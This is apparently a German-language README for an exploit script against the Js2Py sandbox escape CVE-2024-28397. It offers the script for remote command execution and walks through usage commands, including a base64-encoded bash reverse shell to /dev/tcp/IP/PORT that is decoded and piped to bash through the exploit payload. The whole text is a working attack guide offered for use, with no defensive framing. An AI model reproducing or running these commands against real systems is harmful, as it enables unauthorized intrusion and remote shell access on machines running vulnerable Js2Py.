
Generiert JavaScript-Payloads zur Ausnutzung der Js2Py-Sandbox-Escape-Schwachstelle CVE-2024-28397, die entfernte Befehlsausführung und Reverse Shells durch Offenlegung von Python-Interna ermöglicht.
Dieses Skript generiert ein JavaScript-Payload, das von Js2Py in angreifbaren Umgebungen ausgewertet werden kann, in denen Python-Interna über Objekt-Wrapper zugänglich sind.
Einfache Befehlsausführung:
python3 cve-2024-28397.py -c "id"
Erzeuge ein kompaktes einzeiliges Payload:
python3 cve-2024-28397.py -c "whoami" --compact
Erzeuge das Base64-Payload:
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0
Erzeuge das Js2Py-Payload:
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact
Ersetze BASE64_OUTPUT mit dem im ersten Schritt generierten Base64-String.